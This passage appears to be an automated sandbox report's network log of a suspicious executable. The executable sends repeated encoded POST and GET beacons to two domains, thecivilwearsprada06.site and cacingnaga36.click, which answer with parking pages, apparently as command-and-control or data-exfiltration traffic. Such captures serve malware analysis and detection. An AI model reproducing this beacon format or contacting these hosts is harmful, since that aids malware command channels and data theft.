                                                    Data Raw: 56 36 68 3d 50 70 31 67 65 45 2b 4e 33 71 6f 32 6a 43 51 30 61 74 41 53 45 36 73 6f 43 52 41 73 54 35 78 6e 53 41 78 4b 78 65 68 6f 4a 49 35 4e 69 64 63 4a 6b 32 51 59 37 39 49 5a 56 54 68 37 78 2f 62 50 6a 78 32 65 73 67 56 75 4f 33 6f 46 5a 41 4c 6d 2b 75 7a 6d 2f 4d 37 54 70 42 66 79 56 71 34 72 72 43 69 37 51 78 49 65 57 58 6c 62 69 66 62 6e 51 4f 75 6e 48 39 38 77 6f 36 45 59 79 63 54 38 73 66 72 4e 7a 78 50 70 69 34 4f 4f 74 54 46 77 2f 69 68 42 34 74 2b 72 4d 33 39 6f 71 2f 7a 74 53 41 46 50 66 69 46 73 2f 48 4c 56 76 71 74 76 4f 69 30 37 46 38 4a 2f 68 62 7a 57 6f 76 78 54 62 53 68 6f 65 6c 63 3d
                                                    Data Ascii: V6h=Pp1geE+N3qo2jCQ0atASE6soCRAsT5xnSAxKxehoJI5NidcJk2QY79IZVTh7x/bPjx2esgVuO3oFZALm+uzm/M7TpBfyVq4rrCi7QxIeWXlbifbnQOunH98wo6EYycT8sfrNzxPpi4OOtTFw/ihB4t+rM39oq/ztSAFPfiFs/HLVvqtvOi07F8J/hbzWovxTbShoelc=
                                                    Sep 5, 2024 14:27:11.584598064 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:10 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1166
                                                    x-request-id: 2dc3d603-9ab0-4cb8-adfe-2009664d7b1c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==
                                                    set-cookie: parking_session=2dc3d603-9ab0-4cb8-adfe-2009664d7b1c; expires=Thu, 05 Sep 2024 12:42:11 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 30 68 41 4f 43 51 55 4f 6c 76 36 68 57 59 71 36 73 68 7a 71 63 34 43 6c 50 57 75 51 77 37 4f 46 43 77 4f 36 56 31 4f 72 44 4e 43 58 30 50 6a 33 47 67 6f 6b 44 59 56 6f 4e 72 58 2f 69 42 4f 41 65 55 51 49 75 75 4d 55 39 59 31 62 35 77 64 78 59 4d 4c 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:11.584621906 CEST619INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmRjM2Q2MDMtOWFiMC00Y2I4LWFkZmUtMjAwOTY2NGQ3YjFjIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.557229199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:13.714132071 CEST761OUTPOST /2hp8/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.thecivilwearsprada06.site
                                                    Referer: http://www.thecivilwearsprada06.site/2hp8/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 50 70 31 67 65 45 2b 4e 33 71 6f 32 6a 6a 67 30 4b 38 41 53 43 61 73 72 4e 78 41 73 63 5a 78 72 53 42 4e 4b 78 66 6c 34 4a 62 64 4e 69 2f 55 4a 6c 7a 38 59 32 64 49 5a 4e 44 68 45 79 50 62 59 6a 78 36 38 73 68 46 75 4f 33 73 46 5a 43 54 6d 2f 64 62 6e 2f 63 37 4e 38 78 66 30 59 4b 34 72 72 43 69 37 51 78 63 30 57 58 74 62 69 73 44 6e 43 38 57 6b 63 64 38 7a 68 61 45 59 6b 73 54 6e 73 66 72 6a 7a 31 50 44 69 39 4b 4f 74 53 31 77 2f 7a 68 4f 68 64 2b 6c 49 33 38 4a 6c 66 66 6c 56 43 42 62 66 6b 4d 2f 6e 46 66 6e 75 63 41 46 55 41 38 54 57 63 6c 48 78 49 37 68 35 66 51 36 42 78 78 59 41 79 4b 6d 70 55 4a 66 71 62 69 42 4c 75 44 42 33 45 42 46 2b 35 41 51
                                                    Data Ascii: V6h=Pp1geE+N3qo2jjg0K8ASCasrNxAscZxrSBNKxfl4JbdNi/UJlz8Y2dIZNDhEyPbYjx68shFuO3sFZCTm/dbn/c7N8xf0YK4rrCi7Qxc0WXtbisDnC8Wkcd8zhaEYksTnsfrjz1PDi9KOtS1w/zhOhd+lI38JlfflVCBbfkM/nFfnucAFUA8TWclHxI7h5fQ6BxxYAyKmpUJfqbiBLuDB3EBF+5AQ
                                                    Sep 5, 2024 14:27:14.188874960 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:13 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1166
                                                    x-request-id: 984b36d8-9910-49d2-9ffc-9c4d3131bb0f
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==
                                                    set-cookie: parking_session=984b36d8-9910-49d2-9ffc-9c4d3131bb0f; expires=Thu, 05 Sep 2024 12:42:14 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 30 68 41 4f 43 51 55 4f 6c 76 36 68 57 59 71 36 73 68 7a 71 63 34 43 6c 50 57 75 51 77 37 4f 46 43 77 4f 36 56 31 4f 72 44 4e 43 58 30 50 6a 33 47 67 6f 6b 44 59 56 6f 4e 72 58 2f 69 42 4f 41 65 55 51 49 75 75 4d 55 39 59 31 62 35 77 64 78 59 4d 4c 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:14.189316034 CEST619INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTg0YjM2ZDgtOTkxMC00OWQyLTlmZmMtOWM0ZDMxMzFiYjBmIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.557230199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:16.684978962 CEST1778OUTPOST /2hp8/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.thecivilwearsprada06.site
                                                    Referer: http://www.thecivilwearsprada06.site/2hp8/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 50 70 31 67 65 45 2b 4e 33 71 6f 32 6a 6a 67 30 4b 38 41 53 43 61 73 72 4e 78 41 73 63 5a 78 72 53 42 4e 4b 78 66 6c 34 4a 62 56 4e 69 71 59 4a 6b 51 45 59 35 39 49 5a 54 54 68 46 79 50 62 67 6a 79 4b 34 73 6b 63 5a 4f 79 77 46 59 6e 48 6d 32 49 76 6e 77 63 37 4e 2b 78 66 31 56 71 35 32 72 43 79 2f 51 78 4d 30 57 58 74 62 69 70 50 6e 41 75 75 6b 65 64 38 77 6f 36 46 58 79 63 53 70 73 66 69 65 7a 31 62 35 69 4a 2b 4f 74 79 6c 77 7a 68 4a 4f 2b 74 2b 77 46 58 38 72 6c 66 53 37 56 44 74 74 66 6b 52 6b 6e 48 50 6e 73 74 70 67 41 53 4d 49 4d 50 46 51 32 62 79 46 6f 4a 6b 55 63 69 45 75 45 77 50 41 6f 6d 42 78 2f 66 53 51 4c 74 53 2b 31 56 56 57 77 66 78 73 55 43 79 43 75 71 42 77 47 49 4c 79 4b 59 43 69 44 61 39 55 69 66 35 72 61 64 49 2b 31 67 56 33 53 6c 58 72 4e 30 75 70 78 78 4c 54 67 32 41 37 64 47 52 52 32 4d 72 61 38 64 53 33 30 2b 33 48 4e 34 30 66 32 36 51 50 50 49 45 70 75 4a 6c 78 77 53 78 30 2b 4a 78 50 58 4b 6e 78 50 39 7a 45 4a 64 2b 74 6e 35 47 35 69 65 63 35 71 32 57 2b 6e 75 [TRUNCATED]
                                                    Data Ascii: V6h=Pp1geE+N3qo2jjg0K8ASCasrNxAscZxrSBNKxfl4JbVNiqYJkQEY59IZTThFyPbgjyK4skcZOywFYnHm2Ivnwc7N+xf1Vq52rCy/QxM0WXtbipPnAuuked8wo6FXycSpsfiez1b5iJ+OtylwzhJO+t+wFX8rlfS7VDttfkRknHPnstpgASMIMPFQ2byFoJkUciEuEwPAomBx/fSQLtS+1VVWwfxsUCyCuqBwGILyKYCiDa9Uif5radI+1gV3SlXrN0upxxLTg2A7dGRR2Mra8dS30+3HN40f26QPPIEpuJlxwSx0+JxPXKnxP9zEJd+tn5G5iec5q2W+nu5qhNngTBaVv9yj1wv2Vgv7l4QZvkY9d/J2YN9TtaJMOz5ANyew+FY97MvDNfroz8NLQW2YGPTzYZai8Mb8ynDdJFMGkgHug9jem0bMp4xeY7yFQoLDe6LajDmNkE03k4Co+6i4divdG5HOSKK33kHSa4f+UlpzgeGFClVCuZqJ+rjACz5YEN9rMu0ERMllTsn7rfo6O4ihWGWHBclUdqOFKKDylWtLAeA2EVjgbLIU0qQ0GJ3fQuYxt0alHBFeGF2GQNVBc1KCSi7iMtPWDOjHtcvOljq+xP4e6bTzdZxL5kbdVYv70SFTpPZSTdSG8f8kFCWBRQfZPnnr0LQgqhWbiOGgxHvL4O1bqHbWOOZo23h4BSLlqSqYjmLgLbQa4Nhe3y+dmbooA1fghUtY49Pg38VoZjjSve91b+w8HTyWvbV79prmSpTNjK0VBQTU7iFX4L1hj5TAm5MTMtzymwYRVUCGEs2nL+Oa9k76M5dwKeMb3tq/77+a55e6hAMuqYm0cPLkeQ3V8+vcJAST+HkiptV2Mc9J3EDrVykdru6cN+gGID9th34+9JEyZRzEktM1ac0qUCVbXvaPJEaggQ3YFbWigeOM1i5HHI0809EFbdDjYfsQkgH2GsQ9LzlhEm+Qe1y/3tmyMPVUTwI7OtynbzwpEgnTim7E [TRUNCATED]
                                                    Sep 5, 2024 14:27:17.145067930 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:16 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1166
                                                    x-request-id: a0b6458c-7ade-480c-8bb4-4b94ae081672
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==
                                                    set-cookie: parking_session=a0b6458c-7ade-480c-8bb4-4b94ae081672; expires=Thu, 05 Sep 2024 12:42:17 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 30 68 41 4f 43 51 55 4f 6c 76 36 68 57 59 71 36 73 68 7a 71 63 34 43 6c 50 57 75 51 77 37 4f 46 43 77 4f 36 56 31 4f 72 44 4e 43 58 30 50 6a 33 47 67 6f 6b 44 59 56 6f 4e 72 58 2f 69 42 4f 41 65 55 51 49 75 75 4d 55 39 59 31 62 35 77 64 78 59 4d 4c 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:17.145093918 CEST619INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTBiNjQ1OGMtN2FkZS00ODBjLThiYjQtNGI5NGFlMDgxNjcyIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.557231199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:19.228796959 CEST460OUTGET /2hp8/?V6h=CrdAdyOI+okqqhNVS+pkNdIVKBAkN6pudTJL4uhGXJF2xfVUvgIf08oiVWpA0tvbrxzjqgxPP30FNCXR+uyv/IzX8n7qYYw/tQbLXhwufDNvpebHNpaSdeQxoKtamMn3yA==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:19.681514978 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:18 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1530
                                                    x-request-id: 29f4215d-eb7c-49ea-b68c-c4bbe149eb2d
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OM9/aPIfoKgkWuE+SC1ftqvGP91tnxFn8Y41xfiYLCK0C4fjk/cOhmpSxFXI4G01MyTlPE/8f1NZsDmZd3WKTw==
                                                    set-cookie: parking_session=29f4215d-eb7c-49ea-b68c-c4bbe149eb2d; expires=Thu, 05 Sep 2024 12:42:19 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 4d 39 2f 61 50 49 66 6f 4b 67 6b 57 75 45 2b 53 43 31 66 74 71 76 47 50 39 31 74 6e 78 46 6e 38 59 34 31 78 66 69 59 4c 43 4b 30 43 34 66 6a 6b 2f 63 4f 68 6d 70 53 78 46 58 49 34 47 30 31 4d 79 54 6c 50 45 2f 38 66 31 4e 5a 73 44 6d 5a 64 33 57 4b 54 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OM9/aPIfoKgkWuE+SC1ftqvGP91tnxFn8Y41xfiYLCK0C4fjk/cOhmpSxFXI4G01MyTlPE/8f1NZsDmZd3WKTw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:19.681539059 CEST983INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjlmNDIxNWQtZWI3Yy00OWVhLWI2OGMtYzRiYmUxNDllYjJkIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.557232199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:33.075530052 CEST720OUTPOST /ssw0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.cacingnaga36.click
                                                    Referer: http://www.cacingnaga36.click/ssw0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4a 55 36 57 62 47 78 2b 58 51 4b 38 69 58 32 4f 62 66 43 2f 35 6d 33 61 4c 53 62 41 76 39 48 64 32 71 71 43 49 54 30 45 78 72 70 5a 4e 33 49 75 65 57 48 53 46 32 53 30 54 71 31 72 64 31 70 64 6a 36 53 53 39 46 2b 75 34 38 32 50 72 64 4b 70 4e 4d 62 4b 63 72 68 71 70 66 52 51 37 31 63 35 54 2b 66 2b 79 79 64 34 4c 56 48 48 6b 4e 34 33 72 48 67 34 56 63 67 4f 38 33 72 43 55 6f 74 2b 53 53 50 54 42 4f 2f 79 5a 44 5a 41 79 38 30 63 73 30 4c 64 55 65 79 6f 54 44 36 54 51 5a 6d 36 52 68 75 79 49 47 6d 77 30 53 53 77 75 58 4b 6b 78 6f 62 78 57 48 65 57 4e 52 62 33 4b 51 36 50 4a 57 53 43 65 55 49 3d
                                                    Data Ascii: V6h=JU6WbGx+XQK8iX2ObfC/5m3aLSbAv9Hd2qqCIT0ExrpZN3IueWHSF2S0Tq1rd1pdj6SS9F+u482PrdKpNMbKcrhqpfRQ71c5T+f+yyd4LVHHkN43rHg4VcgO83rCUot+SSPTBO/yZDZAy80cs0LdUeyoTD6TQZm6RhuyIGmw0SSwuXKkxobxWHeWNRb3KQ6PJWSCeUI=
                                                    Sep 5, 2024 14:27:33.552771091 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:32 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1138
                                                    x-request-id: 57d986a7-7db3-4fbc-9ff8-55f64b9dc90e
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==
                                                    set-cookie: parking_session=57d986a7-7db3-4fbc-9ff8-55f64b9dc90e; expires=Thu, 05 Sep 2024 12:42:33 GMT; path=/
                                                    connection: close
